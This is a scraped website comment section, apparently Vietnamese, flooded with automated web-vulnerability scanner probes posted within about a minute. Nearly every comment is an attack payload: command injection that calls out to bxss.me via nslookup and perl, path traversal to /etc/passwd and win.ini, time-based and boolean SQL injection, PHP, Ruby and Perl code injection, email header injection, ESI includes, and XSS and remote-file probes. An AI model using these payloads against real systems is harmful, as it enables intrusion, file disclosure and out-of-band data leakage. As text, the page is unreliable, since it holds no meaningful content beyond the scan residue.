|echo fgvrzn$()\ fbfbli\nz^xyu||a #' |echo fgvrzn$()\ fbfbli\nz^xyu||a #|" |echo fgvrzn$()\ fbfbli\nz^xyu||a #

RDFYjolf 17:20 06/09/2022 - Reply

(nslookup hitvprshihajs30588.bxss.me||perl -e "gethostbyname('hitvprshihajs30588.bxss.me')")

RDFYjolf 17:20 06/09/2022 - Reply

$(nslookup hitswrcvqhrjv20834.bxss.me||perl -e "gethostbyname('hitswrcvqhrjv20834.bxss.me')")

RDFYjolf 17:20 06/09/2022 - Reply

&(nslookup hitbocfguvzipf1252.bxss.me||perl -e "gethostbyname('hitbocfguvzipf1252.bxss.me')")&'\"`0&(nslookup hitbocfguvzipf1252.bxss.me||perl -e "gethostbyname('hitbocfguvzipf1252.bxss.me')")&`'

RDFYjolf 17:20 06/09/2022 - Reply

|(nslookup hitaoncqtyaxkea30b.bxss.me||perl -e "gethostbyname('hitaoncqtyaxkea30b.bxss.me')")

RDFYjolf 17:20 06/09/2022 - Reply

`(nslookup hitnpasssyorh30455.bxss.me||perl -e "gethostbyname('hitnpasssyorh30455.bxss.me')")`

RDFYjolf 17:20 06/09/2022 - Reply

;(nslookup hituiksebsgye61c17.bxss.me||perl -e "gethostbyname('hituiksebsgye61c17.bxss.me')")|(nslookup hituiksebsgye61c17.bxss.me||perl -e "gethostbyname('hituiksebsgye61c17.bxss.me')")&(nslookup hituiksebsgye61c17.bxss.me||perl -e "gethostbyname('hituiksebsgye61c17.bxss.me')")

echo psznyz$()\ stcdnx\nz^xyu||a #' &echo psznyz$()\ stcdnx\nz^xyu||a #|" &echo psznyz$()\ stcdnx\nz^xyu||a # 17:20 06/09/2022 - Reply

@4rRWQoZD:

&echo dgukdj$()\ fvsaqt\nz^xyu||a #' &echo dgukdj$()\ fvsaqt\nz^xyu||a #|" &echo dgukdj$()\ fvsaqt\nz^xyu||a # 17:20 06/09/2022 - Reply

@4rRWQoZD:

|echo bulakm$()\ aycfns\nz^xyu||a #' |echo bulakm$()\ aycfns\nz^xyu||a #|" |echo bulakm$()\ aycfns\nz^xyu||a # 17:20 06/09/2022 - Reply

@4rRWQoZD:

(nslookup hitcnhounkjoc910dd.bxss.me||perl -e "gethostbyname('hitcnhounkjoc910dd.bxss.me')") 17:20 06/09/2022 - Reply

@4rRWQoZD:

$(nslookup hitzncrjtuylgbd6c9.bxss.me||perl -e "gethostbyname('hitzncrjtuylgbd6c9.bxss.me')") 17:20 06/09/2022 - Reply

@4rRWQoZD:

|(nslookup hitxqxbcoxeya942b0.bxss.me||perl -e "gethostbyname('hitxqxbcoxeya942b0.bxss.me')") 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

`(nslookup hitjywonvrswoa4b0c.bxss.me||perl -e "gethostbyname('hitjywonvrswoa4b0c.bxss.me')")` 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

5wq8X8kt

C9H03fdX 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

../../../../../../../../../../../../../../etc/passwd

RDFYjolf 17:20 06/09/2022 - Reply

../../../../../../../../../../../../../../windows/win.ini

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

../@4rRWQoZD:

../../../../../../../../../../../../../../etc/passwd 17:20 06/09/2022 - Reply

@4rRWQoZD:

../../../../../../../../../../../../../../windows/win.ini 17:20 06/09/2022 - Reply

@4rRWQoZD:

../RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

17:20 06/09/2022 - Reply

@4rRWQoZD:

12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

'"

RDFYjolf 17:20 06/09/2022 - Reply

<!--

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

'" 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

<!-- 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD: '"()&%<acx><br />

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

'"()&%<acx><br />

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD: 9527340

RDFYjolf'"()&%<acx><br /> 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD: &n975032=v949316

'"()&%<acx><br /> 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf&n921025=v969095 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf9522220 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD: %0abcc:009247.83-108508.83.c43f6.19241.2@bxss.me

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

to@example.com>%0d%0abcc:009247.83-108509.83.c43f6.19241.2@bxss.me

RDFYjolf%0abcc:009247.83-108510.83.c43f6.19241.2@bxss.me 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

/xfs.bxss.me

/xfs.bxss.me 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

to@example.com>%0d%0abcc:009247.83-108511.83.c43f6.19241.2@bxss.me 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD: <esi:include src="http://bxss.me/rpb.png"/>

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf<esi:include src="http://bxss.me/rpb.png"/> 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

${10000396+10000068}

${9999126+9999166} 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RHRSU1JhMEk= 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

HttP://bxss.me/t/xss.html?%00

RDFYjolf 17:20 06/09/2022 - Reply

bxss.me/t/xss.html?%00

RDFYjolf 17:20 06/09/2022 - Reply

)

HttP://bxss.me/t/xss.html?%00 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

!(()&&!|*|*|

RDFYjolf 17:20 06/09/2022 - Reply

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

bxss.me/t/xss.html?%00 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

1some_inexistent_file_with_long_name%00.jpg

RDFYjolf 17:20 06/09/2022 - Reply

^(#$!@#$)(()))******

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

Http://bxss.me/t/fit.txt

) 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

http://bxss.me/t/fit.txt%3F.jpg

!(()&&!|*|*| 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

bxss.me

^(#$!@#$)(()))****** 17:20 06/09/2022 - Reply

@4rRWQoZD:

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

1some_inexistent_file_with_long_name%00.jpg 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

Http://bxss.me/t/fit.txt 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

http://bxss.me/t/fit.txt%3F.jpg 17:20 06/09/2022 - Reply

@4rRWQoZD:

bxss.me 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

"+"A".concat(70-3).concat(22*4).concat(97).concat(85).concat(108).concat(75)+(require"socket" Socket.gethostbyname("hitxr"+"lzivsxqyaee76.bxss.me.")[3].to_s)+"

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

'+'A'.concat(70-3).concat(22*4).concat(112).concat(87).concat(120).concat(77)+(require'socket' Socket.gethostbyname('hitoc'+'vrgytrot12a90.bxss.me.')[3].to_s)+'

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

"+"A".concat(70-3).concat(22*4).concat(111).concat(80).concat(99).concat(88)+(require"socket" Socket.gethostbyname("hityo"+"ykpmxjscb7223.bxss.me.")[3].to_s)+" 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

'+'A'.concat(70-3).concat(22*4).concat(102).concat(69).concat(111).concat(83)+(require'socket' Socket.gethostbyname('hitoq'+'ghdobhowe0607.bxss.me.')[3].to_s)+' 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

'.gethostbyname(lc('hitje'.'pgnenosge8dcc.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(83).chr(109).chr(66).'

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

".gethostbyname(lc("hiths"."ttlpjuji83b2f.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(79).chr(100).chr(88)."

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

'.gethostbyname(lc('hitlp'.'dtlpupype3956.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(88).chr(100).chr(67).' 17:20 06/09/2022 - Reply

@4rRWQoZD:

".gethostbyname(lc("hitif"."oywmwpai957b9.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(85).chr(110).chr(81)." 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

RDFYjolf 17:20 06/09/2022 - Reply

';print(md5(31337));$a='

RDFYjolf 17:20 06/09/2022 - Reply

";print(md5(31337));$a="

RDFYjolf 17:20 06/09/2022 - Reply

${@print(md5(31337))}

RDFYjolf 17:20 06/09/2022 - Reply

${@print(md5(31337))}\

RDFYjolf 17:20 06/09/2022 - Reply

'.print(md5(31337)).'

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 17:20 06/09/2022 - Reply

@4rRWQoZD:

';print(md5(31337));$a=' 17:20 06/09/2022 - Reply

@4rRWQoZD:

";print(md5(31337));$a=" 17:20 06/09/2022 - Reply

@4rRWQoZD:

${@print(md5(31337))} 17:20 06/09/2022 - Reply

@4rRWQoZD:

${@print(md5(31337))}\ 17:20 06/09/2022 - Reply

@4rRWQoZD:

'.print(md5(31337)).' 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:20 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

UsmRFMvB

RDFYjolf 17:21 06/09/2022 - Reply

-1 OR 2+736-736-1=0+0+0+1 --

RDFYjolf 17:21 06/09/2022 - Reply

-1 OR 2+783-783-1=0+0+0+1

RDFYjolf 17:21 06/09/2022 - Reply

-1' OR 2+465-465-1=0+0+0+1 --

RDFYjolf 17:21 06/09/2022 - Reply

-1' OR 2+691-691-1=0+0+0+1 or 'Y3dDDpiR'='

RDFYjolf 17:21 06/09/2022 - Reply

-1" OR 2+470-470-1=0+0+0+1 --

RDFYjolf 17:21 06/09/2022 - Reply

if(now()=sysdate(),sleep(15),0)

RDFYjolf 17:21 06/09/2022 - Reply

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

RDFYjolf 17:21 06/09/2022 - Reply

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

RDFYjolf 17:21 06/09/2022 - Reply

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

RDFYjolf 17:21 06/09/2022 - Reply

1 waitfor delay '0:0:15' --

RDFYjolf 17:21 06/09/2022 - Reply

mjhTeo1V'; waitfor delay '0:0:15' --

RDFYjolf 17:21 06/09/2022 - Reply

TvcTmRjo' OR 556=(SELECT 556 FROM PG_SLEEP(15))--

RDFYjolf 17:21 06/09/2022 - Reply

4ZarvO3z') OR 829=(SELECT 829 FROM PG_SLEEP(15))--

RDFYjolf 17:21 06/09/2022 - Reply

n72PWMbG')) OR 207=(SELECT 207 FROM PG_SLEEP(15))--

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD: '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

RDFYjolf 17:21 06/09/2022 - Reply

1'"

RDFYjolf 17:21 06/09/2022 - Reply

@@lQQT3

XMme6l1A 17:21 06/09/2022 - Reply

@4rRWQoZD:

-1 OR 2+523-523-1=0+0+0+1 -- 17:21 06/09/2022 - Reply

@4rRWQoZD:

-1 OR 2+613-613-1=0+0+0+1 17:21 06/09/2022 - Reply

@4rRWQoZD:

-1' OR 2+79-79-1=0+0+0+1 -- 17:21 06/09/2022 - Reply

@4rRWQoZD:

-1' OR 2+281-281-1=0+0+0+1 or '7DiJtci8'=' 17:21 06/09/2022 - Reply

@4rRWQoZD:

-1" OR 2+756-756-1=0+0+0+1 -- 17:21 06/09/2022 - Reply

@4rRWQoZD:

if(now()=sysdate(),sleep(15),0) 17:21 06/09/2022 - Reply

@4rRWQoZD:

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 17:21 06/09/2022 - Reply

@4rRWQoZD:

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 17:21 06/09/2022 - Reply

@4rRWQoZD:

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ 17:21 06/09/2022 - Reply

@4rRWQoZD:

1 waitfor delay '0:0:15' -- 17:21 06/09/2022 - Reply

@4rRWQoZD:

BVv6ZYze'; waitfor delay '0:0:15' -- 17:21 06/09/2022 - Reply

@4rRWQoZD:

r8RqGBVt' OR 472=(SELECT 472 FROM PG_SLEEP(15))-- 17:21 06/09/2022 - Reply

@4rRWQoZD:

ClJwyVcg') OR 125=(SELECT 125 FROM PG_SLEEP(15))-- 17:21 06/09/2022 - Reply

@4rRWQoZD:

cqs5d7wG')) OR 420=(SELECT 420 FROM PG_SLEEP(15))-- 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 17:21 06/09/2022 - Reply

@4rRWQoZD:

1'" 17:21 06/09/2022 - Reply

@4rRWQoZD:

@@ki0RK 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

RDFYjolf 17:21 06/09/2022 - Reply

@4rRWQoZD:

Để lại bình luận

img

Đăng ký nhận bản tin